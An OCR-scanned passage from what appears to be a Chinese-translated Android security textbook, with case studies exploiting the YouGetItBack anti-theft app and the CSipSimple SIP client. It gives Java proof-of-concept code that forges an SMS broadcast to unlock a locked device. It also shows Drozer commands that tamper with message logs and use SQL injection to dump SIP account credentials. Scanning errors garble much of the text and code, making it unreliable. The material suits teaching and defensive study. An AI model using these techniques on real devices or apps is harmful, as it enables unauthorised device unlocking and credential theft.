YGIB:U 这 样 的 字符 串 。 应 用 不 对 这 条 ni 青 ， 而 是 将 其 传递 给 链 中 下 一 个 注册 的 
Broadcast Receiver。 如 果 你 发 送 一 个 包含 YGIB:U 值 的 短信 消息 ， 你 就 可 能 看 到 不 同 的 行为 : 


## trace thread <1> main (running suspended) 
-- Com.yougetitback.androidapplication.SmsIntentReceiver. 
processContent (Landroid/content/Context;Ljava/lang/String;)V:0 
-- this=Lcom/yougetitback/androidapplication/SmsIntentReceiver; 
<830008303000> 
= =¥GLBSU 
-- Context=Landroid/app/ReceiverRestrictedContext; <830007987072> 














## trace thread <1> main (running suspended) 
-- Com.yougetitback.androidapplication.SmsIntentReceiver. 

processUnLockMsg (Landroid/content/Context;Ljava/util/Vector;)V:0 

-- this=Lcom/yougetitback/androidapplication/SmsIintentReceiver; 
<830008303000> 

-- smsTokens=Ljava/util/Vector; <830008239000> 

-- Context=Landroid/app/ReceiverRestrictedContext; <830007987072> 

-- Com.yougetitback.androidapplication.SmsIntentReceiver. 

processContent (Landroid/content/Context;Ljava/lang/String;)V:232 

-- YGIBDEACTIVATE=YGIB :D 

-== YGIBFIND=YGLBYE 

-- Context=Landroid/app/ReceiverRestrictedContext; <830007987072> 

-=- YGIBUNLOCK=YGIB:U 

this=Lcom/yougetitback/androidapplication/SmsIntentReceiver; 

<830008303000> 

-- settings=Landroid/app/ContextImpl$SharedPreferencesImpl; 
<830007888144> 

== "YEBsy 

-— YGIBBACKUP=YGIB :B 

= YOLTBRESYNGS YGLBRS 

-= YGIBLEOCK=YGIB:L 

-- messageTokens=Ljava/util/Vector; <830008239000> 

-— YGIBWIPE=YGIB:W 

一 一 YCGIDRESTORE= YCGIB:E 

-- Command=YGIB:U 

YGIBREGFROM=YGIB:T 


这 时 ,正如 你 所 期 望 的 那样 ,你 将 遇 到 processCcontent 方法 和 后 续 的 processUnLockMsg 
方法 。 你 可 以 在 processUnLockMsg 方法 上 设置 一 个 断 点 , 从 而 有 机 会 更 深入 地 检查 这 个 方法 。 
你 可 以 使 用 AndBug 的 break 命令 ,并 将 类 与 方法 的 名 字 作 为 参数 传递 过 去 ， 来 完成 这 一 工作 。 


>> break com.yougetitback.androidapplication.SmsIntentReceiver 
processUnLockMsg 
## Setting Hooks 

-- Hooked <536870913> com.yougetitback.androidapplication. 
SmsIntentReceiver.processUnLockMsg (Landroid/content/Context; 
Ljava/util/Vector;)V:0 <class 'andbug.vm.Location'> 
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>> ## Breakpoint hit in thread <1> main (running suspended), process 
suspended. 

-- com.yougetitback.androidapplication.SmsIntentReceiver. 
processUnLockMsg (Landroid/content/Context;Ljava/util/Vector;)V:0 

-- com.yougetitback.androidapplication.SmsIntentReceiver. 
processContent (Landroid/content/Context;Ljava/lang/String;)V:232 

-- com.yougetitback.androidapplication.SmsIntentReceiver. 
onReceive(Landroid/content/Context;Landroid/content/Intent;)V:60 





你 已 经 从 先前 的 分 析 中 了 解 到 getstring 会 被 调用 ， 并 从 共享 配置 文件 中 获取 某 些 值 ， 所 
以 这 时 你 可 以 在 android.content.SharedPreferences 类 上 添加 class-trace， 使 用 
resume 命令 来 继续 进程 。 

>> ct android.content.SharedPreferences 

## Setting Hooks 


-- Hooked android.content.SharedPreferences 
>> resume 





注意 ”运行 method-trace 命令 或 在 某 些 方法 上 直接 设置 断 点 ， 可 能 会 导致 进程 阻 断 和 进程 挂 
掉 ， 所 以 建议 只 对 整个 类 进行 跟踪 。 另 外 ，resume 命令 可 能 需要 运行 两 次 。 





在 进程 恢复 运行 后 , 输出 会 和 之 前 一 样 烦琐 。 再 次 清理 下 调用 栈 , 你 会 最 终 找到 get string 
方法 : 


## Process Resumed 
>> ## trace thread <1> main (running suspended) 


## trace thread <1> main (running suspended) 
-- android.app .SharedPreferencesImpl .getString (Ljava/lang/String; 
Ljava/lang/String;)Ljava/lang/String;:0 
-- this=Landroid/app/SharedPreferencesImpl; <830042611544> 
-- defValue= 
-- key=tagcode 
-- Com.yougetitback.androidapplication.SmsIntentReceiver. 
processUnLockMsg (Landroid/content/Context;Ljava/util/Vector;)V:60 
-- smsTokens=Ljava/util/Vector; <830042967248> 
-- settings=Landroid/app/SharedPreferencesImpl; <830042611544> 
-- this=Lcom/yougetitback/androidapplication/SmsIntentReceiver; 
<830042981888> 
-TYPELOCK=L 
-- YGIBTAG=TAG: 
-- TAG=AAAA 
5 /YOGLTBTYRE=TYBE 
-- Context=Landroid/app/ReceiverRestrictedContext; <830042704872> 
-- setting= 





最 终 你 可 以 看 到 你 所 寻找 的 共享 配置 键 值 tagcode， 这 进一步 证 实 了 你 在 静态 分 析 中 识别 到 
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的 结果 。 这 和 这 里 tagCode 之 后 会 跟随 着 一 个 数字 形式 的 字符 
串 。 了 解 到 这 些 信息 之 后 ， 你 知道 我 们 的 短信 实际 上 需要 包含 YGIB:U 以 及 一 个 空格 和 tagcode 
值 ， 在 本 例 中 即 YGIB:U 137223048617183。 


4.2.4 攻击 


尽管 可 以 向 目标 设备 发 送 你 特意 构造 的 短信 ， 但 是 只 是 知道 tagcode 值 仍 然 可 能 不 够 ， 因 为 
其 他 设备 (甚至 是 任意 设备 ) 的 tagcode 值 很 可 能 不 同 。 为 此 ,你 还 需要 获取 到 日 志 中 泄露 的 值 ， 

而 这 可 以 通过 在 概念 验证 攻击 应 用 中 申请 READ_LOG 权限 获得 。 

知道 了 这 个 tagCode 的 值 之 后 ， 向 目标 设备 发 送 一 条 YGIB:U 137223048617183 格式 的 简 
单 短 信 ， 就 可 以 触发 应 用 的 解锁 组 件 。 甚 至 ， 你 可 以 进一步 在 你 的 概念 验证 攻击 应 用 中 伪造 
SMS_RECEIVED 广播 。 因 为 发 送 一 个 隐 式 的 SMS_RECEIVED Intent 需要 SEND_SMS_BROADCAST 
权限 ， 而 这 一 权限 只 限于 系统 应 用 ， 所 以 只 能 显 式 地 指定 发 给 目标 应 用 中 的 Broadcast Receiver。 
短信 协议 数据 单元 (PDU ) 的 整体 结构 构成 超出 本 章 的 范围 ,我 们 将 在 第 11 章 中 介绍 一 些 细节 ， 
但 在 以 下 代码 片段 中 ， 我 们 给 出 了 伪造 包含 短信 Intent 的 相关 代码 。 


String body = "YGIB:U 137223048617183"; 

String sender = "2125554242"; 

byte[] pdu = null; 

byte[] scBytes = PhoneNumberUtils.networkPortionToCalledPartyBCD(" 
0000000000"); 

byte[] senderBytes = 
PhoneNumberUtils.networkPortionToCalledPartyBCD (sender); 




























































































int lsmcs = scBytes.length; 

byte [] dateBytes = new byte [7]; 

Calendar calendar = new GregorianCalendar (); 

dateBytes [0] = reverseByte ((byte) (calendar.get (Calendar.YEAR))); 

dateBytes [1] = reverseByte ((byte) (calendar.get ( 
Calendar.MONTH) + 1)); 

dateBytes [2] = reverseByte ((byte) (calendar.get ( 
Calendar.DAY_OF_MONTH) ) ) ; 

dateBytes [3] = reverseByte ((byte) (calendar.get ( 
Calendar .HOUR_OF_DAY) ) ) ; 

dateBytes [4] = reverseByte ((byte) (calendar.get ( 
Calendar .MINUTE) ) ) ; 

dateBytes [5] = reverseByte ((byte) (calendar.get ( 
Calenqar .SECOND) ) ) ; 

dateBytes [6] = reverseByte ((byte) ((calendar.get ( 
Calendar.ZONE_OFFSET) + calendar 





.get (Calendar .DST_OFFSET)) / (60 * 1000 * 15))); 
try 
f 





ByteArrayOutputStream bo = new ByteArrayOutputStream (); 
bo.write(lsmcs); 

DoW Ee (Saye 

bo.write (0x04) 

De Wt byte sender.length()); 

bo.write(senderBytes); 
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bo.write(0x00); 
bo.write(0x00); // encoding : 0 for default 7bit 
bo.write(dateBytes); 
{ 
String sReflectedClassName = 
"com.android.internal.telephony .GsmAlphabet"; 


Class cReflectedNFCExtras = Class.forName (sReflectedClassName); 
Method stringToGsm7/BitPacked = cReflectedNFCExtras.getMethod ( 


"stringToGsm7BitPacked", new Class[] { String.class }); 
stringToGsm7BitPacked.setAccessible (true); 

byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke ( 
null,body); 
bo .write(bodqypytes) ; 


pdu = bo.toByteArray (); 

Intent intent = new Intent(); 

intent.setComponent (new ComponentName ("com.yougetitback. 
androidapplication.virgin.mobile", 
"com.yougetitback.androidapplication.SmsIntentReceiver")); 

intent.setAction("android.provider.Telephony .SMS_ _ RECEIVED"); 

intent .putExtra("pdus", new Object[] { pdu }); 

intent .putExtra("format", "3gpp"); 








context.sendOrderedBroadcast (intent,null); 


这 段 代码 首先 构建 了 短信 PDU， 包 括 YGIB:U 命令 、tagcode 值 、 发 送 者 的 号 码 ， 以 及 其 他 
相关 的 PDU 属性 值 。 然 后 使 用 反射 机 制 来 调用 stringToGsm7BitPacked 方法 , 将 PDU 主体 
包装 到 适当 的 表示 中 ， 而 表示 PDU 主体 的 字 节 数组 随后 被 放置 到 pau 对 象 中 。 接 下 来 ， 创 建 出 

















一 个 Intent 对 象 ,将 目标 组 件 设置 为 应 用 的 短信 接收 需 ,， 将 动作 设置 为 sMSs_REC1 


























EIV. 





ED。 然 后 设 


置 一 些 extra 的 属性 值 , 其 中 最 为 重要 的 是 将 pau 对象 增加 到 使 用 "paus" 键 值 的 extra 域 。 最 后 ， 
调用 sendorderdBroadcast 方法 将 构造 的 Pntent 发 送出 去 ， 就 可 以 引导 目标 应 用 来 解锁 设备 。 
为 了 演示 这 一 效果 ， 以 下 代码 显示 了 设备 被 解锁 时 的 logcat 输出 (在 本 例 中 通过 短信 ， 而 





1234 是 用 户 用 来 锁定 设备 的 PIN 码 )。 


I/MessageListener: (14008): 1234 

D/FOREGROUNDSERVICE(14008): onCreate 
I/FindLocationService(14008): FindLocationService created!!! 
D/FOREGROUNDSERVICE(14008): onStartCommand 
D/SIRENSERVICE(14008): onCreate 

D/SIRENSERVICE(14008): onStartCommand 


I/LockAcknowledgeService(14008): LockAcknowledgeService created!!! 
I/FindLocationService(14008): FindLocationService stopped!!! 
I/ActivityManager (13738): START {act=android.intent.action.VIEW 
cat=[test.foobar.123] flg=0x10000000 
cmp=com.yougetitback.androidapplication.virgin.mobile/ 
com.yougetitback.androidapplication.SplashScreen u=0} from pid 14008 





图 4-7 显示 了 锁定 设备 的 屏幕 截图 。 
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.3 


REPORTED AS LOST/STOLEN 


Touch screen for options 





图 4-7 应 用 锁定 设备 的 屏幕 截图 
你 的 应 用 在 运行 时 会 发 送 一 个 特殊 构造 的 短信 来 解锁 这 个 设备 ， 你 会 看 到 如 下 的 logcat 





I/MessageListener: (14008): YGIB:U TAG:136267293995242 
V/SWIPEWIPE(14008): recieved unlock message 
D/FOREGROUNDSERVICE(14008): onDestroy 

I/ActivityManager (13738): START {act=android.intent.action.VIEW 
cat=[test.foobar.123] flg=0x10000000 
cmp=com.yougetitback.androidapplication.virgin.mobile/ 
com.yougetitback.androidapplication.SplashScreen (has extras) u=0} 
from pid 14008 

D/SIRENSERVICE(14008): onDestroy 

I/UnlockAcknowledgeService(14008): UnlockAcknowledgeService created!!! 
I/UnlockAcknowledgeService(14008): UnlockAcknowledgeService stopped!!! 


运行 完成 后 ， 你 将 再 次 得 到 一 个 被 解锁 的 设备 。 


案例 分 析 : SIP 客户 端 
这 个 简要 的 案例 分 析 会 向 你 展示 : 如 何 发 现 一 个 未 经 保护 的 Content Provider, 并 从 中 获取 可 











能 的 敏感 数据 。 在 这 个 案例 中 ， 分 析 的 应 用 是 CSipSimple， 一 个 流行 的 会 话 初 始 协议 (SIP ) 客 
户 端 。 与 上 个 案例 详细 分 析 应 用 的 方法 不 同 ， 这 里 我 们 将 使 用 另 一 种 快捷 简单 的 动态 分 析 技术 。 














4.3.1 了 解 Drozer 





Drozer (原名 Mercury ) 是 由 MWR 实验 室 开发 的 一 球 可 扩展 的 模块 化 Android 安全 测试 


TH 
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架 。 它 使 用 一 个 在 目标 设备 上 运行 的 代理 应 用 和 一 个 基于 Python 的 远程 终端 ， 测 试 者 可 以 在 远 
程 终端 上 发 出 一 些 测试 指令 。 它 具有 许多 功能 模块 ， 支 持 如 获取 应 用 信息 、 发 现 未 经 保护 的 IPC 
接口 和 攻击 设备 等 操作 。 上 默认 情况 下 ， 它 以 只 有 INTERNET 权限 的 标准 应 用 用 户 身份 运行 。 


4.3.2 ”发 现 漏洞 


在 Drozer 配 置 完毕 和 运行 之 后 ,你 可 以 快速 地 识别 出 CSipSimple 应 用 导出 的 Content Provider 
RI， 以 及 它们 的 权限 要 求 。 运 行 app .provider.info 模块 ,传递 -a com.csipsimple 作为 
参数 可 以 限定 只 对 目标 应 用 进行 扫描 : 


dz> run app.provider.info -a com.csipsimple 
Package: com.csipsimple 
Authority: com.csipsimple.prefs 
Read Permission: android.permission.CONFIGURE_SIP 
Write Permission: android.permission.CONFIGURE_SIP 
Multiprocess Allowed: False 
Grant Uri Permissions: False 
Authority: com.csipsimple.db 
Read Permission: android.permission.CONFIGURE_SIP 
Write Permission: android.permission.CONFIGURE_SIP 
Multiprocess Allowed: False 
Grant Uri Permissions: False 























为 了 与 这 些 Content Provider 接口 进行 交互 , 必须 拥有 android.permission.CONFIGURE_ 
SIP 权限 。 然而 这 并 不 是 标准 的 Android 权限 ,而 是 由 CSipSimple 声明 的 自 定义 权限 , 你 可 以 在 
CSipSimple 的 Manifest 文件 中 找到 权限 声明 。 运 行 app .package .manifest， 并 将 程序 包 名 作 
为 唯一 参数 传递 ， 这 可 以 获取 到 整个 Manifest 文件 ， 以 下 输出 结果 对 其 进行 了 删 减 , 只 显示 了 相 
关 信 息 。 


dz> run app.package.manifest com.csipsimple 



































<permission label="@2131427348" name="android.permission.CONFIGURE_SIP" 
protectionLevel="0xl" permissionGroup="android.permission-group.COST MONEY" 
description="@2131427349"> 

</permission> 


可 以 看 到 ，cCONFIGURE_SIP 权限 被 声明 为 0x1 的 保护 级 别 ， 这 对 应 到 “危险 ”级 别 ( 这 种 
级 别 会 提示 用 户 在 安装 时 接受 权限 ,大 多 数 情 况 下 用 户 会 照 做 ), 然 而 , 由 于 没有 指定 Signature 
或 者 signatureorsystem 级 别 ， 其 他 应 用 也 可 以 申请 这 个 权限 。 默 认 情 况 下 ，Drozer 的 代理 
应 用 并 没有 这 一 权限 ， 但 是 通过 修改 Manifest 文件 和 重建 代理 APK 应 用 ， 可 以 非常 轻易 地 获取 
这 一 权限 。 

在 重新 制作 一 个 具有 CONFIGURE_SIP 权限 的 Drozer 代理 之 后 ， 你 就 可 以 开始 查询 这 些 
Content Provider 接口 了 。 你 可 以 从 发 现 CSipSimple 所 暴露 的 Content Provider URI 着 手 ， 为 此 ， 
你 需要 运行 名 为 app .provigder .finduris 的 模块 : 
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dz> run app .provider.finduri com.csipsimple 
Scanning com.csipsimple... 
content://com.csipsimple.prefs/raz 
content://com.csipsimple.db/ 
content://com.csipsimple.db/calllogs 
content://com.csipsimple.db/outgoing filters 
content://com.csipsimple.db/accounts/ 
content://com.csipsimple.db/accounts_status/ 
content://com.android.contacts/contacts 





4.3.3 snarfing 


查询 结果 给 我 们 提供 了 许多 选项 ， 包 括 一 些 看 起 来 比较 有 意思 的 接口 ， 如 messages 和 | 
calllogs。 查询 这 些 Content Provider 接口 , 首先 从 messages 开始 , 可 以 使 用 app .proviaer . 
query 模块 ， 以 Content Provider URI 作为 参数 : 





























dz> run app.provider.query content://com.csipsimple.db/messages 


| id | sender | receiver | eontset | body 

| mime_type | type | date | status | read | full_sender 

| 1 | SELF | sip:bob@ostel.co | sip:bobQ@ostel.co | Hello! | 
text/plain | 5 [ 13372293408925. | oS | 1 | < sip:bobQ@ostel.co> 

















结果 将 返回 数据 存储 的 列 名 和 每 行 数据 ， 。 中 ， 在 Content Provider 接口 后 台 是 SQLite 
数据 库 。 现 在 你 已 经 可 以 访问 到 这 些 即时 通信 消息 日 志 了 ， 这 些 数据 对 应 于 图 4-8 所 示 的 消息 
Activity/ 截 屏 。 





于 妆 四 全 区 
& Q 


New message 








图 4-8 ”CSipSimple 的 消息 记录 截屏 
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你 还 可 以 使 用 app .proviaer.update 模块 ， 尝 试 对 这 些 Content Provider 接口 进行 写 操作 
或 者 更 新 。 你 需要 传递 Content Provider URI， 指定 查询 约束 的 selection 和 selection-args 
参数 ,你 想 要 替换 的 列 名 ， 以 及 替换 的 数据 。 这 里 我 们 将 receiver 和 body 列 的 原始 值 修改 为 
一 些 看 起 来 更 邪恶 的 值 : 


dz> run app.provider.update content://com.csipsimple.db/messages 














--Selection "id=?" --selection-args 1 --string receiver "sip:badguy@ostel.co" 
--String contact "sip:badguy@ostel.co" --string body "omg crimes" 

--String full_ sender "<sip:badguy@ostel .co>" 

Done. 


将 receiver 从 bob@ostel.co 修改 为 badguy@ostel .co, 而 message 从 Hello1! 修 改 
为 omg crimes， 图 4-9 显示 了 更 新 后 的 屏幕 截图 。 
你 也 看 到 了 calllogs 接口 ， 同 样 你 也 可 以 查询 : 


dz> run app.provider.query content://com.csipsimple.db/calllogs 

















_id | name | numberlabel | numbertype | date | duration | 
new | number type account_id | status_code status_ 
text 

5 [UE .| | 0 | 1372294364590 | 286 | 0 

| "Bob" <sip:bobeostel.co> | 1 |: 二 | 200 

Normal call clearing | 

4 null null 0 1372294151478 34 0 

| <sip:bob@ostel .co> | 六 bb | 200 

Normal call clearing | 





于 当 四 全 区 
& © 


New message 


badguy 

















图 4-9 修改 后 CSipSimple 的 消息 记录 截屏 


与 messages 接口 和 消息 屏幕 截图 非常 相似 ， 图 4-10 中 的 屏幕 显示 了 calllogs 的 数据 。 
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日 四 生 C 耻 合 思 剖面 11:12 





图 4-10 CSipSimple 的 呼叫 记录 截屏 


这 个 数据 也 可 以 通过 一 个 简单 的 命令 进行 更 新 ， 使 用 一 个 查询 约束 来 更 新 以 boblostel.co 
为 目的 的 所 有 记录 : 


dz> run app .provider.update content://com.csipsimple.db/calllogs 








--selection "number=?" --selection-args "<sip:bobQ@ostel.co>" 
--String number "<sip:badguy@ostel .co>" 
Done. 








图 4-11 显示 了 呼叫 记录 更 新 之 后 的 屏幕 截图 。 


EE 
& O 食 国 


badguy 





telcom oe. 





图 4-11 修改 后 CSipSimple 的 呼叫 记录 截屏 
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4.3.4 注入 











Content Provider 接口 如 果 没 有 进行 充分 的 输入 验证 , 或 者 查询 语句 构建 处 理 方式 不 恰当 ( 比 


如 对 用 户 输入 进行 未 经 过 滤 的 连接 )， 那 么 就 会 存在 注入 漏洞 。 这 会 以 多 种 形式 显现 出 来 ， 比 如 
针对 以 SQLite 为 后 台 Content Provider 接口 的 SQL 注入 , 以 及 以 文件 系统 为 后 台 Content Provider 
接口 的 目录 遍历 。Drozer 提供 了 发 现 这 些 问题 的 多 个 模块 , 如 scanner .provider.traversal 


和 scanner.provider.injection 模块 。 


现 出 


SQL 


数据 库 中 到 底 有 哪些 数据 内 容 ， 你 可 以 再 


接口 ， 


在 多 个 Content Provider 接口 以 同一 SQLite 数据 库 作 为 后 台 的 情况 下 ， 





CSipSimple 中 的 SQL 注入 安全 漏洞 。 
dz> run scanner.provider.injection -a com.csipsimple 
Scanning com.csipsimple... 
Not Vulnerable : 

content://com.csipsimple.prefs/raz 
content://com.csipsimple.db/ 
content://com.csipsimple.prefs/ 


content://com.csipsimple.db/accounts_status/ 








Injection in Projection: 
content://com.csipsimple.db/calllogs 
content://com.csipsimple.db/outgoing_ filters 
content://com.csipsimple.db/accounts/ 
content://com.csipsimple.db/accounts 


Injection in Selection: 
content://com.csipsimple.db/thread/ 
content://com.csipsimple.db/calllogs 
content://com.csipsimple.db/outgoing_ filters 











运行 scanner .provider.injection 模块 可 以 发 


与 Web 应 用 中 的 传统 


注入 非常 类 似 ， 你 可 以 获取 到 其 他 表 中 的 内 容 。 首 先 ， 查 看 这 些 Content Provider 接口 后 台 
































SOLITE MASTER-- 来 获取 SQLite 数据 库 的 schema。 








dz> run app.provider.query content://com.csipsimple.db/calllogs 
--projection "* FROM SQOLITE MASTER--" 
| type | name | tbl_name | rootpage | sqal 

| 
| table | androiqd metadata | androiqd metadata | 3 | CREATE TABLE 
android metadata (locale TEXT) 

| 
| table | accounts | accounts | 4 | CREATE TABLE 
accounts (id INTEGER PRIMARY KEY AUTOINCREMENT,active INTEGER,wizard 
TEXT, display_name TEXT,p 
riority INTEGER,acc_id TEXT NOT NULL,reg_ uri TEXT,mwi_enabled BOOLEAN, 
publish enabled INTEGER,reg_ timeout INTEGER, ka_interval INTEGER,Ppidf_tuple id 
TEXT, force_contac 


次 使 用 app. ns query 模块 来 查询 calllogs 





但 这 次 你 可 以 加 上 一 个 projection 参数 来 指定 你 所 选择 的 列 名 ， 可 以 输入 * 下 


ROM 
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t TEXT,allow_contact_rewrite INTEGER,contact_rewrite method INTEGER, 
Contact_params TEXT,contact_ uri params TEXT,transport 

INTEGER, default_uri_scheme TEXT,use_srtp IN 

TEGER, use_zrtp INTEGER,Proxy TEXT,reg_use proxy INTEGER,realm TEXT, 
Scheme TEXT,username TEXT,datatype INTEGER,data TEXT, initial_auth 
INTEGER, auth_algo TEXT,sip_stack 

INTEGER,vm_nbr TEXT,reg_dbr INTEGER,try_clean reg INTEGER, 

use_rfc5626 INTEGER DEFAULT 1,rfc5626_instance_id TEXT,rfc5626_reg_id 
TEXT, vid_in auto_show INTEGER DEFAUL 

T -1,viqd out_auto transmit INTEGER DEFAULT -1,rtp_port INTEGER DEFAULT 一 
1,rtp_enable qos INTEGER DEFAULT -1,rtp_qos_dscp INTEGER DEFAULT 一 

J tp bound addr TEXT, tp 

ublic_addr TEXT,android group TEXT,allow_ via rewrite INTEGER DEFAULT 0， 
sip_stun use INTEGER DEFAULT -1,media_ stun use INTEGER DEFAULT -1,ice cfg use 
INTEGER DEFAULT 

-1,ice_cfg_enable INTEGER DEFAULT 0,turn cfg use INTEGER DEFAULT -1, 
turn_cfg_enable INTEGER DEFAULT 0,turn cfg_server TEXT,turn cfg_user 
TEXT, turn_cfg_pwd TEXT,ipv6_ 

media use INTEGER DEFAULT 0,wizard_ data TEXT) 

table | sqlite sequence | sqlite sequence | 5 | CREATE TABLE 
sqlite_sequence (name, seq) 


你 可 以 看 到 有 个 名 为 accounts 的 表 ， 推 测 里 面包 含 登 录 凭 据 等 账号 数据 。 你 可 以 在 查询 的 
projection 参数 中 使 用 非常 简单 的 SQL 注入 语句 ， 获 取 在 accounts 表 中 的 数据 ， 其 中 包含 登 
录 和 凭证 。 这 次 你 在 查询 中 可 以 使 用 * FROM accounts-- 人 参数 值 : 


dz> run app.provider.query content://com.csipsimple.db/calllogs 
--projection "* FROM accounts--" 











id | active | wizard | display_ name | priority | acc_ id 
reg_uri | mwi_enabled | publish enabled | reg timeout | ka_interval 
pidf_tuple_ idq | force contact | allow contact_ rewrite 
contact_rewrite method | contact params | contact uri params | transport 
default uri_scheme | use_srtp use_zrtp 
proxy | reg_use proxy | realm | Scheme | username | datatype 
data | initial_auth auth_algo | sip_stack | 
1 | 站 | OSTN | OSTN | 100 
<sip:THISISMYUSERNAMEQ@ostel .co> sip:ostel.co | 1 上 还 
1800 | 0 | null | null eve 
2 | null | null | 3 
sip | 筷 汗 J | sips:ostel.co:5061 | 3 
党 | Digest | THISISMYUSERNAME Pe | THISISMYPASSWORD | 0 
null | 0 | 人 98 | et et 





| 





注意 前 面 讨论 的 CSipSimple 应 用 中 的 安全 漏洞 已 经 被 修补 。CONFIGURE_SIP 权限 被 从 
android.permission 移动 到 一 个 更 明确 的 命名 空间 , 并 提供 了 用 法 与 影响 的 更 详细 描 
述 。 另 外 ,在 Content Provider 接口 中 的 SQL 注入 漏洞 也 被 修补 了 ,这 进一步 限制 了 对 敏 
感 信 息 的 访问 。 
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4.4 小 结 


本 章 概述 了 影响 Android 应 用 的 一 般 安 全 问题 。 对 于 每 类 安全 问题 ， 本 章 都 展示 了 一 个 公开 
案例 来 帮助 聚焦 所 带 来 的 潜在 影响 。 你 也 随 着 我 们 对 两 个 公开 Android 应 用 进行 了 案例 分 析 ， 
个 案例 分 析 都 非常 详细 地 说 明了 如 何 使 用 通用 工具 来 评估 应 用 ,挖掘 安全 漏洞 ,并 利用 这 些 漏 洞 。 

第 一 个 案例 分 析 使 用 Androguard 来 对 目标 应 用 执行 静态 分 析 、 反 汇编 和 反 编 译 。 在 完成 这 
些 之 后 ,你 识别 出 了 可 以 攻击 的 安全 相关 组 件 , 具体 而 言 ,你 找到 了 一 个 使 用 短信 进行 授权 的 设 
备 加 锁 /解锁 功能 。 接 下 来 ， 你 使 用 了 动态 分 析 技 术 ( 如 对 应 用 进行 调试 ) 来 扩大 和 确认 静态 分 
析 的 发 现 。 最 后 , 你 编写 了 一 些 概 念 验证 攻击 代码 来 伪造 一 条 短信 , 并 攻破 应 用 的 设备 解锁 功能 。 

第 二 个 案例 分 析 演 示 了 使 用 Drozer 在 应 用 中 找 出 与 Content Provider 相关 数据 暴露 问题 的 快 
捷 简 单 的 方法 。 首 先 ， 你 发 现 了 应 用 暴露 出 一 些 用 户 Activity 和 敏感 消息 日 志 。 然 后 ， 你 看 到 了 
对 存储 数据 的 算 改 是 多 么 简单 。 最 后 ， 案 例 分 析 讨 论 了 利用 SQL 注入 安全 漏洞 从 应 用 数据 库 中 
获取 其 他 敏感 数据 的 细节 。 

下 一 章 将 讨论 Android 的 整体 攻击 面 ， 以 及 如 何 开 发 Android 攻击 整体 策略 。 


































































































理解 Android 的 攻击 面 











全 面 了 解 一 个 设备 的 攻击 面 是 成 功 实施 攻击 或 防御 的 关键 , 这 句 话 不 仅 适 用 于 其 他 计算 机 系 
统 ， 同 样 也 适用 于 Android 设备 。 作 为 一 位 以 使 用 未 公开 安全 漏洞 实施 攻击 为 目标 的 安全 研究 人 
员 , 应 该 首先 对 设备 进行 安全 评估 ， 而 评估 过 程 的 第 一 步 就 是 枚 举 攻击 面 。 类 似 地 ， 对 一 个 计算 
机 系统 进行 防御 也 需要 理解 系统 可 能 被 攻击 的 所 有 可 能 途径 。 

可 能 你 对 攻击 概念 一 无 所 知 ， 但 在 读 完 本 章 后 ， 你 将 可 以 看 出 许多 Android 的 攻击 面 到 底 在 
哪里 。 本 章 首先 将 清晰 定义 攻击 向 量 与 攻击 面 这 两 个 基本 概念 , 接 下 来 , 将 讨论 攻击 面 的 相关 属 
性 与 形态 ,这 些 属性 将 用 于 根据 影响 对 攻击 面 进行 分 类 ,本 章 余下 内 容 将 把 不 同 攻击 面 分 成 几 类 ， 
然后 讨论 每 一 类 的 重要 细节 。 你 可 以 了 解 到 Android 设备 可 以 被 攻击 的 多 种 途径 ， 某 些 途径 会 以 
已 发 生 的 攻击 作为 证 明 。 你 也 会 学 到 如 何 使 用 各 种 不 同 的 工具 和 技术 , 从 而 自己 更 进一步 地 探索 
Android 的 攻击 面 。 


5.1 攻击 基础 术语 


在 深入 分 析 Android 攻击 面 之 前 ， 首 先 必须 定义 和 澄清 我 们 在 本 章 中 使 用 的 术语 。 在 一 个 计 
算 机 网 络 上 ,用户 们 有 可 能 通过 发 起 一 些 动作 , 来 破坏 其 他 计算 机 系统 的 安全 性 。 这 种 类 型 的 动 
作 被 称 为 “攻击 ”， 而 发 起 这 些 攻 击 的 人 自然 就 被 称 为 “攻击 者 "。 通 常 攻 击 者 的 目的 是 影响 目标 
系统 的 机 密 性 、 完 整 性 或 可 用 性 ， 也 就 是 所 谓 的 CIA 安全 属性 。 成 功 的 攻击 通常 依赖 于 目标 系 
统 中 存在 着 的 特定 安全 漏洞 。 当 讨论 攻击 时 ， 最 经 常 涉及 的 两 个 概念 是 攻击 向 量 (attack vector ) 
和 攻击 面 (attack surface )。 攻 击 向 量 和 攻击 面 是 紧密 关联 的 ， 因 而 也 经 常 被 混淆 ,但 是 对 于 任何 
一 次 成 功 攻击 而 言 ， 这 两 者 都 是 独立 不 同 的 元 素 。 














































































































注意 ”通用 安全 漏洞 评分 系统 (CVSS ) 是 一 个 被 广泛 接受 用 于 安全 漏洞 信息 分 类 与 评级 的 标准 。 
它 通过 组 合 多 个 重要 的 概念 最 终 形 成 一 个 数字 评分 ， 用 于 划分 调查 或 消除 不 同安 全 漏洞 
的 优先 级 。 
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5.1.1 攻击 向 量 


攻击 向 量 通常 指 的 是 攻击 者 实施 行动 的 方式 ,描述 了 用 来 执行 攻击 的 方法 。 简单 地 说 , 它 描 
述 了 攻击 者 是 如 何 到 达 并 接触 任意 给 定 的 漏洞 代码 的 。 如 果 再 深入 一 点 , 攻击 向 量 可 以 基于 多 个 
标准 进行 分 类 , 包括 所 需 认 证 条 件 、 可 访问 性 与 难度 。 这 些 标准 经 常用 来 决定 如 何 对 公开 披露 安 
全 漏洞 或 者 正在 实施 的 攻击 进行 优先 度 评定 。 例 如, 向 目标 发 送 一 封 电子 邮件 是 非常 高 层次 上 的 
攻击 向 量 ， 而 这 个 攻击 动作 通常 不 需要 认证 , 但 成 功 攻 击 则 需要 接收 者 进行 某 些 操作 ,如 打开 这 
封 邮件 。 与 监听 网 络 服务 进行 连接 则 是 另 一 种 攻击 向 量 , 在 这 种 情况 中 , 可 能 需要 认证 也 可 能 不 
需要 ， 这 取决 于 安全 漏洞 存在 于 网 络 服务 的 具体 位 置 。 








































































































注 
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MITRE 公司 的 通用 攻击 模式 枚 举 和 分 类 ( CAPEC ) 项 目的 目标 是 对 攻击 进行 枚 举 和 分 类 ， 
形成 攻击 模式 库 。 这 个 项 目 中 包含 并 扩展 了 传统 攻击 向 量 的 概念 。 




















攻击 向 量 经 常 基于 常见 攻击 的 属性 进行 进一步 分 类 。 例 如 , 发 送 带 有 附件 的 电子 邮件 是 一 种 
比 发 送 电 子 邮 件 更 具体 的 攻击 向 量 。 你 还 可 以 再 进一步 指定 附件 的 确切 类 型 。 此 外 ,发 送 电 子 邮 
